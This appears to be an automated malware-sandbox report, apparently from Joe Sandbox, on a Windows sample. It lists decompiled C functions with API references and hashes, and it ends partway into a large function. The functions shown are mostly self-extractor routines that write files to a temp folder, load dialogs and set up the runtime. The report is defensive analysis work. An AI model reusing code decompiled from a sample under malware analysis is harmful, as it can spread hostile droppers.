                                                                                                                                                                                                          • Instruction ID: f0fe2da67756379c4bb3f0d46d6590b516ce832b916433cd10f083959a4ac334
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 408b713907885a9c79332d3ab5b27c46d981cedbd7859f336313169061eab56a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1711E531500119AFCB14EFA8ED0DAAE77B8FF0A301F064151F516E2191DE709E00CB96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                          			E008663C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				long _v272;
                                                                                                                                                                                                          				void* _v276;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          				long _t28;
                                                                                                                                                                                                          				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t15 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                          				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_v276 = _a16;
                                                                                                                                                                                                          				_t37 = 1;
                                                                                                                                                                                                          				E00861781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          				E0086658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                          				_t28 = 0;
                                                                                                                                                                                                          				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                          				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                          					_t28 = _a4;
                                                                                                                                                                                                          					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                          						 *0x869124 = 0x80070052;
                                                                                                                                                                                                          						_t37 = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					CloseHandle(_t39);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					 *0x869124 = 0x80070052;
                                                                                                                                                                                                          					_t37 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                          			}
















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0086642D
                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0086645B
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0086647A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008663EB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                          • API String ID: 1065093856-2312194364
                                                                                                                                                                                                          • Opcode ID: 1df1a1633109aaf3e003cbf63befec9d1f9087811d32b24860984dbf4f0b3319
                                                                                                                                                                                                          • Instruction ID: f6a3ede38963d9db8c8ab4c8e10f520942a5c5e9cae9f04c1be529b3d1a1c511
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df1a1633109aaf3e003cbf63befec9d1f9087811d32b24860984dbf4f0b3319
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A21F071A00218ABCB20DF29DC85FEA73ACFB45314F1101A9E595E7280EAB46D948FA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008647E0(intOrPtr* __ecx) {
                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                          				intOrPtr _t9;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                          				intOrPtr* _t22;
                                                                                                                                                                                                          				void _t24;
                                                                                                                                                                                                          				struct HWND__* _t25;
                                                                                                                                                                                                          				struct HWND__* _t26;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				intOrPtr* _t28;
                                                                                                                                                                                                          				intOrPtr* _t33;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 = __ecx;
                                                                                                                                                                                                          				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                          				if(_t34 != 0) {
                                                                                                                                                                                                          					_t22 = _t33;
                                                                                                                                                                                                          					_t27 = _t22 + 1;
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t6 =  *_t22;
                                                                                                                                                                                                          						_t22 = _t22 + 1;
                                                                                                                                                                                                          					} while (_t6 != 0);
                                                                                                                                                                                                          					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                          					 *_t34 = _t24;
                                                                                                                                                                                                          					if(_t24 != 0) {
                                                                                                                                                                                                          						_t28 = _t33;
                                                                                                                                                                                                          						_t19 = _t28 + 1;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t9 =  *_t28;
                                                                                                                                                                                                          							_t28 = _t28 + 1;
                                                                                                                                                                                                          						} while (_t9 != 0);
                                                                                                                                                                                                          						E00861680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                          						_t11 =  *0x8691e0; // 0x2df8360
                                                                                                                                                                                                          						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                          						 *0x8691e0 = _t34;
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t25 =  *0x868584; // 0x0
                                                                                                                                                                                                          					E008644B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                          					LocalFree(_t34);
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t26 =  *0x868584; // 0x0
                                                                                                                                                                                                          				E008644B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}
















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00864E6F), ref: 008647EA
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00864823
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00864847
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00864851
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                          • API String ID: 359063898-2312194364
                                                                                                                                                                                                          • Opcode ID: 6012e1ffe8dd33cd8dbacd297f0e1295861e268d20146964d3e3e6ccbd65ee6c
                                                                                                                                                                                                          • Instruction ID: 5ec3393b69feab89f55a70ede8d1b9e36c4bba60f0a9fc0e23921ad7a889ebfa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6012e1ffe8dd33cd8dbacd297f0e1295861e268d20146964d3e3e6ccbd65ee6c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11112CB5204641AFD7199F249C18F7A375AF7C5304F169529FA82DB341DE768C068760
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00863680(void* __ecx) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				struct tagMSG _v36;
                                                                                                                                                                                                          				int _t8;
                                                                                                                                                                                                          				struct HWND__* _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v8 = __ecx;
                                                                                                                                                                                                          				_t16 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                          					if(_t8 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							if(_v36.message != 0x12) {
                                                                                                                                                                                                          								DispatchMessageA( &_v36);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t16 = 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                          						} while (_t8 != 0);
                                                                                                                                                                                                          						if(_t16 == 0) {
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					break;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t8;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0086369F
                                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008636B2
                                                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 008636CB
                                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008636DA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2776232527-0
                                                                                                                                                                                                          • Opcode ID: 9ee9e9da2b29fa39819354544270d94e5e705c720c86664d0b8001045f94599d
                                                                                                                                                                                                          • Instruction ID: 0c96479caee7207d799ff736cc022f23748f7fdd16b3fcd480690baeb5cedc75
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ee9e9da2b29fa39819354544270d94e5e705c720c86664d0b8001045f94599d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801A77290021577DF304BA69C48FEB76BCFBD6B10F010119F906F2180D5A0C640DA60
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E00866517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                          				struct HRSRC__* _t6;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				struct HINSTANCE__* _t23;
                                                                                                                                                                                                          				int _t24;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t23 =  *0x869a3c; // 0x860000
                                                                                                                                                                                                          				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                          				if(_t6 == 0) {
                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                          					E008644B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					_t24 = _a16;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                          					if(_t21 == 0) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(_a12 != 0) {
                                                                                                                                                                                                          							_push(_a12);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                          						FreeResource(_t21);
                                                                                                                                                                                                          						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00860000,000007D6,00000005), ref: 0086652A
                                                                                                                                                                                                          • LoadResource.KERNEL32(00860000,00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00866538
                                                                                                                                                                                                          • DialogBoxIndirectParamA.USER32(00860000,00000000,00000547,008619E0,00000000), ref: 00866557
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00866560
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1214682469-0
                                                                                                                                                                                                          • Opcode ID: aee6d7921ebd3e243c39da60e9b70faff040f8d16f1079c8a8564b32979f29ad
                                                                                                                                                                                                          • Instruction ID: 5b372a917426e16ee846c087e8b0b68ad767b16f4235c2ffc1d9cd386c551342
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aee6d7921ebd3e243c39da60e9b70faff040f8d16f1079c8a8564b32979f29ad
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901D672100659BBDB106FA99C4DDBB7A6DFF85761F020125FE16E3190EBB18D208AA1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                          			E008665E8(char* __ecx) {
                                                                                                                                                                                                          				char _t3;
                                                                                                                                                                                                          				char _t10;
                                                                                                                                                                                                          				char* _t12;
                                                                                                                                                                                                          				char* _t14;
                                                                                                                                                                                                          				char* _t15;
                                                                                                                                                                                                          				CHAR* _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t12 = __ecx;
                                                                                                                                                                                                          				_t15 = __ecx;
                                                                                                                                                                                                          				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                          				_t10 = 0;
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					_t3 =  *_t12;
                                                                                                                                                                                                          					_t12 =  &(_t12[1]);
                                                                                                                                                                                                          				} while (_t3 != 0);
                                                                                                                                                                                                          				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                          					if(_t16 <= _t15) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if( *_t16 == 0x5c) {
                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                          						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                          							_t16 = CharNextA(_t16);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *_t16 = _t10;
                                                                                                                                                                                                          						_t10 = 1;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_push(_t16);
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                          					return _t10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *_t16 == 0x5c) {
                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L11;
                                                                                                                                                                                                          			}










                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00862B33), ref: 00866602
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000), ref: 00866612
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000), ref: 00866629
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00866635
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Prev$Next
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3260447230-0
                                                                                                                                                                                                          • Opcode ID: 9a147a3404f40a2b90a75cb78ea653bf6b5876a97d21d76e2a4a73fa73e323e4
                                                                                                                                                                                                          • Instruction ID: d7e2f7c9b4198e70c7bad6ba755343c90b6180faa23777f6244272dfc694da37
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a147a3404f40a2b90a75cb78ea653bf6b5876a97d21d76e2a4a73fa73e323e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF02D310041D06ED7361B28FC888B7BF9CFFA7354B1B016FE492E2001F6550D068A61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008669B0() {
                                                                                                                                                                                                          				intOrPtr* _t4;
                                                                                                                                                                                                          				intOrPtr* _t5;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				 *0x8681f8 = E00866C70();
                                                                                                                                                                                                          				__set_app_type(E00866FBE(2));
                                                                                                                                                                                                          				 *0x8688a4 =  *0x8688a4 | 0xffffffff;
                                                                                                                                                                                                          				 *0x8688a8 =  *0x8688a8 | 0xffffffff;
                                                                                                                                                                                                          				_t4 = __p__fmode();
                                                                                                                                                                                                          				_t11 =  *0x868528; // 0x0
                                                                                                                                                                                                          				 *_t4 = _t11;
                                                                                                                                                                                                          				_t5 = __p__commode();
                                                                                                                                                                                                          				_t12 =  *0x86851c; // 0x0
                                                                                                                                                                                                          				 *_t5 = _t12;
                                                                                                                                                                                                          				_t6 = E00867000();
                                                                                                                                                                                                          				if( *0x868000 == 0) {
                                                                                                                                                                                                          					__setusermatherr(E00867000);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E008671EF(_t6);
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00866FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00866FC5
                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 008669C2
                                                                                                                                                                                                          • __p__fmode.MSVCRT ref: 008669D8
                                                                                                                                                                                                          • __p__commode.MSVCRT ref: 008669E6
                                                                                                                                                                                                          • __setusermatherr.MSVCRT ref: 00866A07
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1632413811-0
                                                                                                                                                                                                          • Opcode ID: 6e2e5638f6878289bdee13d79f170e9502ed5ee2d7e859952b650e678df55625
                                                                                                                                                                                                          • Instruction ID: c44dfd93919d2b26821290ec8389240bd5b65fb7dd122a9c928e440e5932e232
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e2e5638f6878289bdee13d79f170e9502ed5ee2d7e859952b650e678df55625
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF0F870188741CFC718AF34ED1E6043BA1FB05335B132719E466D63E0DFBA85508E12
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:2.7%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:28%
                                                                                                                                                                                                          Signature Coverage:14.7%
                                                                                                                                                                                                          Total number of Nodes:339
                                                                                                                                                                                                          Total number of Limit Nodes:38

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E004019F0(void* __edx, void* __eflags) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				void* _t337;
                                                                                                                                                                                                          				void* _t340;
                                                                                                                                                                                                          				int _t341;
                                                                                                                                                                                                          				CHAR* _t344;
                                                                                                                                                                                                          				intOrPtr* _t349;
                                                                                                                                                                                                          				int _t350;
                                                                                                                                                                                                          				long _t352;
                                                                                                                                                                                                          				signed int _t354;
                                                                                                                                                                                                          				intOrPtr _t358;
                                                                                                                                                                                                          				long _t359;
                                                                                                                                                                                                          				CHAR* _t364;
                                                                                                                                                                                                          				struct HINSTANCE__* _t365;
                                                                                                                                                                                                          				CHAR* _t366;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t367;
                                                                                                                                                                                                          				int _t368;
                                                                                                                                                                                                          				int _t369;
                                                                                                                                                                                                          				int _t370;
                                                                                                                                                                                                          				intOrPtr* _t376;
                                                                                                                                                                                                          				int _t378;
                                                                                                                                                                                                          				intOrPtr _t379;
                                                                                                                                                                                                          				intOrPtr* _t381;
                                                                                                                                                                                                          				int _t383;
                                                                                                                                                                                                          				intOrPtr* _t384;
                                                                                                                                                                                                          				int _t385;
                                                                                                                                                                                                          				int _t396;
                                                                                                                                                                                                          				int _t399;
                                                                                                                                                                                                          				int _t402;
                                                                                                                                                                                                          				int _t405;
                                                                                                                                                                                                          				intOrPtr* _t407;
                                                                                                                                                                                                          				int _t413;
                                                                                                                                                                                                          				int _t415;
                                                                                                                                                                                                          				void* _t421;
                                                                                                                                                                                                          				int _t422;
                                                                                                                                                                                                          				int _t424;
                                                                                                                                                                                                          				intOrPtr* _t428;
                                                                                                                                                                                                          				intOrPtr _t429;
                                                                                                                                                                                                          				intOrPtr* _t431;
                                                                                                                                                                                                          				int _t432;
                                                                                                                                                                                                          				int _t435;
                                                                                                                                                                                                          				intOrPtr* _t437;
                                                                                                                                                                                                          				int _t438;
                                                                                                                                                                                                          				intOrPtr* _t439;
                                                                                                                                                                                                          				int _t440;
                                                                                                                                                                                                          				int _t442;
                                                                                                                                                                                                          				signed int _t448;
                                                                                                                                                                                                          				signed int _t451;
                                                                                                                                                                                                          				signed int _t452;
                                                                                                                                                                                                          				int _t469;
                                                                                                                                                                                                          				int _t471;
                                                                                                                                                                                                          				int _t482;
                                                                                                                                                                                                          				signed int _t486;
                                                                                                                                                                                                          				intOrPtr* _t488;
                                                                                                                                                                                                          				intOrPtr* _t490;
                                                                                                                                                                                                          				intOrPtr* _t492;
                                                                                                                                                                                                          				intOrPtr _t493;
                                                                                                                                                                                                          				void* _t494;
                                                                                                                                                                                                          				struct HRSRC__* _t497;
                                                                                                                                                                                                          				void* _t514;
                                                                                                                                                                                                          				int _t519;
                                                                                                                                                                                                          				intOrPtr* _t520;
                                                                                                                                                                                                          				void* _t524;
                                                                                                                                                                                                          				void* _t525;
                                                                                                                                                                                                          				struct HINSTANCE__* _t526;
                                                                                                                                                                                                          				intOrPtr _t527;
                                                                                                                                                                                                          				void* _t531;
                                                                                                                                                                                                          				void* _t535;
                                                                                                                                                                                                          				struct HRSRC__* _t536;
                                                                                                                                                                                                          				intOrPtr* _t537;
                                                                                                                                                                                                          				intOrPtr* _t539;
                                                                                                                                                                                                          				int _t542;
                                                                                                                                                                                                          				int _t543;
                                                                                                                                                                                                          				intOrPtr* _t547;
                                                                                                                                                                                                          				intOrPtr* _t548;
                                                                                                                                                                                                          				intOrPtr* _t549;
                                                                                                                                                                                                          				intOrPtr* _t550;
                                                                                                                                                                                                          				void* _t551;
                                                                                                                                                                                                          				intOrPtr _t552;
                                                                                                                                                                                                          				int _t555;
                                                                                                                                                                                                          				void* _t556;
                                                                                                                                                                                                          				void* _t557;
                                                                                                                                                                                                          				void* _t558;
                                                                                                                                                                                                          				void* _t559;
                                                                                                                                                                                                          				void* _t560;
                                                                                                                                                                                                          				void* _t561;
                                                                                                                                                                                                          				void* _t562;
                                                                                                                                                                                                          				intOrPtr* _t563;
                                                                                                                                                                                                          				void* _t564;
                                                                                                                                                                                                          				void* _t565;
                                                                                                                                                                                                          				void* _t566;
                                                                                                                                                                                                          				void* _t567;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t567 = __eflags;
